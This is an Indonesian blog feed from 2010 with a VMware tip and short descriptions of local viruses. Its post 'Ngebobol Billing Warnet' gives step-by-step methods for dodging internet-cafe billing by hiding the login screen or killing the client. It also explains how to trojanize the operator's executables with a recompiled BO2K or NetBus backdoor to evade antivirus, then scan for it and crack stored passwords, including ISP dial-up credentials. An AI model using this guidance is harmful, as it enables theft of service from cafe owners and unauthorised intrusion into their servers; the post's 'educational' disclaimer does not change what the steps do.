<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8177802711873346685</id><updated>2011-07-08T10:06:11.487-07:00</updated><title type='text'>Rinaldo Jonathan</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-3090889675050341425</id><published>2010-05-31T23:51:00.000-07:00</published><updated>2010-05-31T23:56:46.957-07:00</updated><title type='text'>Windows 7 Aero di Virtual Machine...</title><content type='html'>yaa... sekali lagi hal yang aneh... gruuu&lt;br /&gt;sekarang sudah ada virtual machine yang mensupport Windows Aero...&lt;br /&gt;itu dia VMWare...&lt;br /&gt;tapi download yang terbaru ya, biar bisa...&lt;br /&gt;pertama habis udah di install, nilai aja dulu komputer nya... maksud gw System Performance...&lt;br /&gt;Bingung? cari di games, ada satu.&lt;br /&gt;Kalau nilainya masih 1.0, instal dulu vmware tools nya...&lt;br /&gt;dijamin nanti paling enggak 2.0...&lt;br /&gt;cuma itu... kadang masih crash, jadi jangan nyimpan yg penting2 di situ, ok??&lt;br /&gt;selamat mencoba! gw mau lanjutin pendalaman materi yg membosankan ini :-(&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-3090889675050341425?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/3090889675050341425/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/05/windows-7-aero-di-virtual-machine.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/3090889675050341425'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/3090889675050341425'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/05/windows-7-aero-di-virtual-machine.html' title='Windows 7 Aero di Virtual Machine...'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-1359848098988643462</id><published>2010-02-22T21:16:00.000-08:00</published><updated>2011-03-03T22:17:01.782-08:00</updated><title type='text'>Ngebobol Billing Warnet..</title><content type='html'>Membobol Semua Jenis Billing Warnet&lt;br /&gt;&lt;br /&gt;Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia&lt;br /&gt;&lt;br /&gt;Cara pertama&lt;br /&gt;&lt;br /&gt;Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi&lt;br /&gt;Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.&lt;br /&gt;Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)&lt;br /&gt;Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!&lt;br /&gt;&lt;br /&gt;Penasaran mau tau caranya ? Baca aja sampai habis !&lt;br /&gt;Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?&lt;br /&gt;&lt;br /&gt;Ini dia caranya …&lt;br /&gt;Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.&lt;br /&gt;Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan&lt;br /&gt;&lt;br /&gt;Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.&lt;br /&gt;&lt;br /&gt;Yang harus disiapkan:&lt;br /&gt;1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket. Aku nemunya pas sd tapi baru sekarang kepake ^^&lt;br /&gt;2. Muka bego&lt;br /&gt;3. Mental yang kuat&lt;br /&gt;&lt;br /&gt;Langkah-langkahnya:&lt;br /&gt;&lt;br /&gt;01. Masuk warnet dan pasang muka bego biar ga dicurigai operator&lt;br /&gt;02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.&lt;br /&gt;03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.&lt;br /&gt;04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.&lt;br /&gt;05. Saat masuk login screen, login aja seperti biasa.&lt;br /&gt;06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.&lt;br /&gt;07. Setelah ZHider dijalankan langsung aja logout.&lt;br /&gt;08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!&lt;br /&gt;09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.&lt;br /&gt;10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana&lt;br /&gt;11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.&lt;br /&gt;12. Logout. SIapkan muka bego, lalu bayar tarif.&lt;br /&gt;&lt;br /&gt;Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.&lt;br /&gt;&lt;br /&gt;Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider&lt;br /&gt;&lt;br /&gt;CTRL+ALT+Z Menyembunyikan jendela aktif&lt;br /&gt;CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan&lt;br /&gt;CTRL+ALT+L Menampilkan dialog zhider&lt;br /&gt;CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.&lt;br /&gt;&lt;br /&gt;Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan&lt;br /&gt;Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.&lt;br /&gt;&lt;br /&gt;NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..&lt;br /&gt;&lt;br /&gt;Cara kedua&lt;br /&gt;&lt;br /&gt;1.pasang muka culun (ato bego) kek yg diomongkan diatas&lt;br /&gt;2.sediah kopi&lt;br /&gt;3.tentunya rokok&lt;br /&gt;4.nah sekarang yg perlu kalian jalankan adalah&lt;br /&gt;5.cabut kabel lan cardnya …&lt;br /&gt;6.trus restart komputer kamu&lt;br /&gt;7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008&lt;br /&gt;gampangkan ?&lt;br /&gt;&lt;br /&gt;Cara ketiga&lt;br /&gt;&lt;br /&gt;Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.&lt;br /&gt;&lt;br /&gt;Prosedurnya adalah :&lt;br /&gt;Tetap harus login terlebih dahulu agar tidak mencurigakan&lt;br /&gt;&lt;br /&gt;Download Wincontrol –&gt;&gt; winctrl.exe untuk bypass login screen&lt;br /&gt;&lt;br /&gt;Ekstrak wincontrol dan aktifkan&lt;br /&gt;F9 = untuk menghilangkan window pada aktif cursor&lt;br /&gt;F10= untuk mengembalikan window seperti semula&lt;br /&gt;Jalankan timer untuk mengingatkan durasi waktu yang diinginkan&lt;br /&gt;Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-&lt;br /&gt;Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.&lt;br /&gt;&lt;br /&gt;Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.&lt;br /&gt;&lt;br /&gt;Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net&lt;br /&gt;&lt;br /&gt;Cara keempat&lt;br /&gt;&lt;br /&gt;Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus&lt;br /&gt;- Portscanner&lt;br /&gt;- Nekat !&lt;br /&gt;&lt;br /&gt;Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).&lt;br /&gt;&lt;br /&gt;- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p &gt;, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.&lt;br /&gt;&lt;br /&gt;- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.&lt;br /&gt;&lt;br /&gt;- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )&lt;br /&gt;&lt;br /&gt;- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan&lt;br /&gt;program sedang dipakai, pake program lain spt iexplore.exe ).&lt;br /&gt;&lt;br /&gt;- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.&lt;br /&gt;&lt;br /&gt;- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).&lt;br /&gt;&lt;br /&gt;- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.&lt;br /&gt;&lt;br /&gt;- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan krack pakelophtkrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali..&lt;br /&gt;&lt;br /&gt;- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server warnet…OK&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-1359848098988643462?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/1359848098988643462/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/02/ngebobol-billing-warnet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1359848098988643462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1359848098988643462'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/02/ngebobol-billing-warnet.html' title='Ngebobol Billing Warnet..'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-7004041900373118028</id><published>2010-02-17T20:59:00.000-08:00</published><updated>2010-02-17T21:00:47.468-08:00</updated><title type='text'>Virus BigBang</title><content type='html'>&lt;span style="font-weight:bold;"&gt;BigBang.&lt;/span&gt; Virus ini dibuat dengan bahasa pemrograman Visual Basic, berukuran sekitar 20 KB dalam keadan ter-pack. Beberapa file virus akan diciptakan pada root drive dengan nama file Sandra Dewi.exe, Luna Maya.exe, DSC_0506.exe, DSC_1505.exe dan sebagainya. String BigBang terlihat saat klik kanan file virus, pilih Properties - Version - Internal Name. Beberapa aplikasi akan dialihkan oleh virus, antara lain:&lt;br /&gt;&lt;br /&gt;- Saat mengakses command prompt (Start - Run - cmd), aplikasi yang dipanggil adalah OSK (On Screen Keyboard).&lt;br /&gt;- Saat mengakses MS Config (Start - Run - msconfig), aplikasi yang dipanggil adalah game MSheart.&lt;br /&gt;- Saat mengakses Task Manager (Start - Run - taskmgr), aplikasi yang dipanggil adalah Magnify.&lt;br /&gt;&lt;br /&gt;Pada saat login, akan ditampilkan pesan:&lt;br /&gt;&lt;br /&gt;PESAN DARI SURGA&lt;br /&gt;PERSAHABATAN TAK AKAN PERNAH ABADI&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-7004041900373118028?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/7004041900373118028/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/02/virus-bigbang.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7004041900373118028'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7004041900373118028'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/02/virus-bigbang.html' title='Virus BigBang'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-1407464027021429141</id><published>2010-01-27T01:11:00.000-08:00</published><updated>2010-01-27T01:12:09.514-08:00</updated><title type='text'>Virus Indaboxa</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S2ADUPV_SxI/AAAAAAAAAB8/MrLVrxyt-kQ/s1600-h/indaboxa.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 300px; height: 254px;" src="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S2ADUPV_SxI/AAAAAAAAAB8/MrLVrxyt-kQ/s320/indaboxa.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5431344796859845394" /&gt;&lt;/a&gt;&lt;br /&gt;Indaboxa. Virus ini dibuat menggunakan Visual Basic dengan ukuran sekitar 40KB.File-file yang diciptakannya pada root drive antara lain bernama “Bocoran UAN dan UAS.exe”, “Counter Strike.exe”, dan nama file lain yang bisa jadi mengundang pengguna untuk menjalankannya jika tidak waspada. Jika menilik properties file-nya, pada bagian Version Comment dan Company akan tertera: INDABOXA.&lt;br /&gt;&lt;br /&gt;Salah satu ciri virus ini adalah mengubah nilai registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText dengan pesan: “KESALAHAN BUKAN PADA KOMPUTER ANDA MELAINKAN PADA DIRI ANDA”. Pesan tersebut akan tampil ketika pengguna menekan CTRL + ALT + DEL untuk masuk ke dalam Windows Log On, atau saat melakukan Log Off dan ingin login dengan user account lain.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-1407464027021429141?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/1407464027021429141/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-indaboxa.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1407464027021429141'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1407464027021429141'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-indaboxa.html' title='Virus Indaboxa'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S2ADUPV_SxI/AAAAAAAAAB8/MrLVrxyt-kQ/s72-c/indaboxa.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-2161709173424411891</id><published>2010-01-26T19:33:00.000-08:00</published><updated>2010-01-26T19:40:52.448-08:00</updated><title type='text'>Virus EvolutionMp3</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S1-1lXOE28I/AAAAAAAAAB0/u_PueTMlqBY/s1600-h/evolutionMp3.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 268px;" src="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S1-1lXOE28I/AAAAAAAAAB0/u_PueTMlqBY/s320/evolutionMp3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5431259329124948930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;EvolutionMp3. Virus ini dibuat dengan bahasa pemrograman Visual Basic, dengan ukuran sekitar 44 KB. File berekstensi *.mp3 yang ia temukan akan dihapus dan digantikan dengan file virus. Konfigurasi klik pada mouse akan tertukar antara klik kanan dan klik kiri. Contohnya jika Anda biasa menjalankan sebuah aplikasi dengan klik ganda tombol mouse sebelah kiri, maka saat virus ini aktif, Anda baru bisa menjalankan aplikasi dengan klik ganda tombol mouse sebelah kanan.  Setiap akan masuk Windows, virus menampilkan pesan sebagai berikut:&lt;br /&gt;&lt;br /&gt;STOP PIRACY!!!!&lt;br /&gt;&lt;br /&gt;Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-2161709173424411891?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/2161709173424411891/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-evolutionmp3.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2161709173424411891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2161709173424411891'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-evolutionmp3.html' title='Virus EvolutionMp3'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S1-1lXOE28I/AAAAAAAAAB0/u_PueTMlqBY/s72-c/evolutionMp3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-522506501668766825</id><published>2010-01-25T18:02:00.000-08:00</published><updated>2010-01-25T18:08:15.833-08:00</updated><title type='text'>Virus Gambar</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15NfgMDqnI/AAAAAAAAABs/Azq1ngoKbog/s1600-h/gambar.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 150px;" src="http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15NfgMDqnI/AAAAAAAAABs/Azq1ngoKbog/s320/gambar.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5430863404267186802" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Gambar. Salah satu hal yang meresahkan pengguna komputer yang terkena virus adalah saat file-file datanya dimanipulasi virus, entah dihapus, di-hidden, atau di-encrypt. Demikian pula yang dilakukan virus ini, berukuran sekitar 84 KB, virus ini dibuat dengan bahasa pemrograman Delphi. Untungnya, virus ini hanya mengubah atribut file-file dengan ekstensi *.doc, *.xls, *.jpg, *.mp3, dan *.3gp menjadi super hidden. Lalu virus akan menduplikasikan diri meniru namafile file-file yang telah diubah atributnya tadi. Virus ini juga mengcopykan dirinya dengan nama gambar.exe ke beberapa folder yang telah ditentukan. Seperti umumnya virus lain, virus ini memiliki pesan tertentu sebagai tanda eksistensinya. Virus membuat file BACA_DULU_DONG!!!!!!!!!.BAT, yang berisi pesan berikut:&lt;br /&gt;&lt;br /&gt;MAAF YA MAU PINJAM KOMPUTERNYA UNTUK ISTIRAHAT SEBENTAR AJA, BOLEHKAN ?????&lt;br /&gt;JANGAN KHAWATIR KOMPUTER NYA NGAK DIAPA - APAIN DECH&lt;br /&gt;SOAL NYA AQ BARU DATANG DARI TEMPAT YANG JAUH…… MAKLUMLAH MUSAFIR&lt;br /&gt;Oh.. Ya… JADI LUPA NICH KENALKAN NAMAKU ” G3X.B ”&lt;br /&gt;SALAM KENAL BUAT SIAPA SAJA YANG SEDANG AKTIF DI KOMPUTER INI&lt;br /&gt;ADUH JADI NGEREPOTIN NICH, AQ MAU ISTRAHAT DULU YA,  DA..AA.AAA&lt;br /&gt;GOOD LUCK FOR YOU !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-522506501668766825?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/522506501668766825/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-gambar.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/522506501668766825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/522506501668766825'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-gambar.html' title='Virus Gambar'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Rf6HHbGr9iQ/S15NfgMDqnI/AAAAAAAAABs/Azq1ngoKbog/s72-c/gambar.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-2677947610574236874</id><published>2010-01-25T17:59:00.001-08:00</published><updated>2010-01-25T18:00:20.851-08:00</updated><title type='text'>Virus Mshearts</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15MlvtclBI/AAAAAAAAABk/-XQTgvHwzWo/s1600-h/mshearts.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 187px;" src="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15MlvtclBI/AAAAAAAAABk/-XQTgvHwzWo/s320/mshearts.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5430862412001350674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Mshearts. Dibuat dengan VB Script dan berukuran sekitar 32 KB, virus ini menyerang root drive termasuk removable disk hingga mencapai drive letter O, dengan mengcopykan file dengan nama mshearts.vbs dan autorun.inf. Keberadaan virus ini relatif mudah diketahui karena virus akan meletakkan file dengan nama I’M here.htm pada desktop. Pesan pada file HTML tersebut berisi:&lt;br /&gt;&lt;br /&gt;.vbs LOLA 666. &lt;br /&gt;&lt;br /&gt;– Pesan Negara –&lt;br /&gt;&lt;br /&gt;Coba lihatlah keadaan pedidikan di negeri kami..&lt;br /&gt;&lt;br /&gt;Apakah pemerintah sudah memberikan yang terbaik..&lt;br /&gt;&lt;br /&gt;Masih ada yang jauh di sana..&lt;br /&gt;&lt;br /&gt;Yang tidak menerima pendidikan..&lt;br /&gt;&lt;br /&gt;Pemerintah tidak bertanggung jawab..&lt;br /&gt;&lt;br /&gt;Memajukan pendidikan umum..&lt;br /&gt;&lt;br /&gt;Ini merupakan janji kalian untuk kami..&lt;br /&gt;(¯`•.¸¸.»[I’M Back]«.¸¸.•´¯)&lt;br /&gt;-= Sorong papua 17-06-08 =-&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-2677947610574236874?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/2677947610574236874/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-mshearts.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2677947610574236874'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2677947610574236874'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-mshearts.html' title='Virus Mshearts'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15MlvtclBI/AAAAAAAAABk/-XQTgvHwzWo/s72-c/mshearts.png' height='72' 